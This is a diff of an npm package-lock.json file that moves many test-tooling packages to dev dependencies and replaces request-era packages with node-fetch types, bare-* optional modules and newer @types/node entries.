"@babel/types": "^7.0.0" @@ -882,20 +973,16 @@ "version": "7.20.6", "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", + "dev": true, "dependencies": { "@babel/types": "^7.20.7" } }, - "node_modules/@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==", - "dev": true - }, "node_modules/@types/graceful-fs": { "version": "4.1.9", "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", + "dev": true, "dependencies": { "@types/node": "*" } @@ -903,12 +990,14 @@ "node_modules/@types/istanbul-lib-coverage": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==" + "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", + "dev": true }, "node_modules/@types/istanbul-lib-report": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", + "dev": true, "dependencies": { "@types/istanbul-lib-coverage": "*" } @@ -917,6 +1006,7 @@ "version": "3.0.1", "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", + "dev": true, "dependencies": { "@types/istanbul-lib-report": "*" } @@ -925,6 +1015,7 @@ "version": "29.5.14", "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", + "dev": true, "dependencies": { "expect": "^29.0.0", "pretty-format": "^29.0.0" @@ -937,41 +1028,38 @@ "dev": true }, "node_modules/@types/node": { - "version": "20.17.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.10.tgz", - "integrity": "sha512-/jrvh5h6NXhEauFFexRin69nA0uHJ5gwk4iDivp/DeoEua3uwCUto6PC86IpRITBOs4+6i2I56K5x5b6WYGXHA==", + "version": "22.15.32", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.15.32.tgz", + "integrity": "sha512-3jigKqgSjsH6gYZv2nEsqdXfZqIFGAV36XYYjf9KGZ3PSG+IhLecqPnI310RvjutyMwifE2hhhNEklOUrvx/wA==", + "dev": true, + "license": "MIT", "dependencies": { - "undici-types": "~6.19.2" + "undici-types": "~6.21.0" } }, - "node_modules/@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", "dev": true, + "license": "MIT", "dependencies": { - "@types/caseless": "*", "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" + "form-data": "^4.0.0" } }, "node_modules/@types/stack-utils": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==" - }, - "node_modules/@types/tough-cookie": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.2.tgz", - "integrity": "sha512-Q5vtl1W5ue16D+nIaW8JWebSSraJVlK+EthKn7e7UcD4KWsaSJ8BqGPXNaPghgtcn/fhvrN17Tv8ksUsQpiplw==", + "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", "dev": true }, - "node_modules/@types/ws": { - "version": "8.5.5", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.5.tgz", - "integrity": "sha512-lwhs8hktwxSjf9UaZ9tG5M03PGogvFaH8gUgLNbN9HKIg0dvv6q+gkSuJ8HN4/VbyxkuLzCjlN7GquQ0gUJfIg==", + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", "dev": true, + "license": "MIT", "dependencies": { "@types/node": "*" } @@ -980,6 +1068,7 @@ "version": "17.0.24", "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", + "dev": true, "dependencies": { "@types/yargs-parser": "*" } @@ -987,28 +1076,24 @@ "node_modules/@types/yargs-parser": { "version": "21.0.0", "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==" + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "node_modules/agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", "dev": true, - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "license": "MIT", + "engines": { + "node": ">= 14" } }, "node_modules/ansi-escapes": { "version": "4.3.2", "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "dev": true, "dependencies": { "type-fest": "^0.21.3" }, @@ -1023,6 +1108,7 @@ "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "dev": true, "engines": { "node": ">=8" } @@ -1031,6 +1117,7 @@ "version": "4.3.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, "dependencies": { "color-convert": "^2.0.1" }, @@ -1045,6 +1132,7 @@ "version": "3.1.3", "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", + "dev": true, "dependencies": { "normalize-path": "^3.0.0", "picomatch": "^2.0.4" @@ -1059,54 +1147,31 @@ "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", "dev": true }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dev": true, - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "dev": true, - "engines": { - "node": ">=0.8" - } - }, "node_modules/async": { "version": "3.2.6", "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==" + "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", + "dev": true }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", - "dev": true - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "dev": true, - "engines": { - "node": "*" - } + "license": "MIT" }, - "node_modules/aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==", - "dev": true + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "dev": true, + "license": "Apache-2.0" }, "node_modules/babel-jest": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", + "dev": true, "dependencies": { "@jest/transform": "^29.7.0", "@types/babel__core": "^7.1.14", @@ -1127,6 +1192,7 @@ "version": "6.1.1", "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.0.0", "@istanbuljs/load-nyc-config": "^1.0.0", @@ -1142,6 +1208,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", + "dev": true, "dependencies": { "@babel/template": "^7.3.3", "@babel/types": "^7.3.3", @@ -1156,6 +1223,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", + "dev": true, "dependencies": { "@babel/plugin-syntax-async-generators": "^7.8.4", "@babel/plugin-syntax-bigint": "^7.8.3", @@ -1178,6 +1246,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", + "dev": true, "dependencies": { "babel-plugin-jest-hoist": "^29.6.3", "babel-preset-current-node-syntax": "^1.0.0" @@ -1192,21 +1261,92 @@ "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "dev": true }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "dev": true, + "license": "Apache-2.0", + "optional": true + }, + "node_modules/bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "dev": true, + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" + }, + "engines": { + "bare": ">=1.16.0" + }, + "peerDependencies": { + "bare-buffer": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } + } + }, + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "dev": true, + "license": "Apache-2.0", + "optional": true, + "engines": { + "bare": ">=1.14.0" + } + }, + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "dev": true, + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-os": "^3.0.1" + } + }, + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", "dev": true, + "license": "Apache-2.0", + "optional": true, "dependencies": { - "tweetnacl": "^0.14.3" + "streamx": "^2.21.0" + }, + "peerDependencies": { + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "version": "1.1.12", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", + "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", + "dev": true, + "license": "MIT", "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" @@ -1216,6 +1356,7 @@ "version": "3.0.3", "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "dev": true, "dependencies": { "fill-range": "^7.1.1" }, @@ -1227,6 +1368,7 @@ "version": "4.24.2", "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", + "dev": true, "funding": [ { "type": "opencollective", @@ -1258,6 +1400,7 @@ "version": "0.2.6", "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", + "dev": true, "dependencies": { "fast-json-stable-stringify": "2.x" }, @@ -1269,6 +1412,7 @@ "version": "2.1.1", "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", + "dev": true, "dependencies": { "node-int64": "^0.4.0" } @@ -1276,21 +1420,28 @@ "node_modules/buffer-from": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==" + "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", + "dev": true }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + }, "engines": { - "node": ">=0.10.0" + "node": ">= 0.4" } }, "node_modules/callsites": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "dev": true, "engines": { "node": ">=6" } @@ -1299,6 +1450,7 @@ "version": "5.3.1", "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", + "dev": true, "engines": { "node": ">=6" } @@ -1307,6 +1459,7 @@ "version": "1.0.30001680", "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", + "dev": true, "funding": [ { "type": "opencollective", @@ -1322,16 +1475,11 @@ } ] }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==", - "dev": true - }, "node_modules/chalk": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, "dependencies": { "ansi-styles": "^4.1.0", "supports-color": "^7.1.0" @@ -1347,14 +1495,6 @@ "version": "1.0.2", "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", "dev": true, "engines": { "node": ">=10" @@ -1364,6 +1504,7 @@ "version": "3.8.0", "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", + "dev": true, "funding": [ { "type": "github", @@ -1377,12 +1518,14 @@ "node_modules/cjs-module-lexer": { "version": "1.4.1", "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==" + "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", + "dev": true }, "node_modules/cliui": { "version": "8.0.1", "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "dev": true, "dependencies": { "string-width": "^4.2.0", "strip-ansi": "^6.0.1", @@ -1396,6 +1539,7 @@ "version": "4.6.0", "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", + "dev": true, "engines": { "iojs": ">= 1.0.0", "node": ">= 0.12.0" @@ -1404,12 +1548,14 @@ "node_modules/collect-v8-coverage": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==" + "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", + "dev": true }, "node_modules/color-convert": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, "dependencies": { "color-name": "~1.1.4" }, @@ -1420,13 +1566,15 @@ "node_modules/color-name": { "version": "1.1.4", "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dev": true, + "license": "MIT", "dependencies": { "delayed-stream": "~1.0.0" }, @@ -1437,23 +1585,20 @@ "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + "dev": true }, "node_modules/convert-source-map": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==" - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", "dev": true }, "node_modules/create-jest": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", + "dev": true, "dependencies": { "@jest/types": 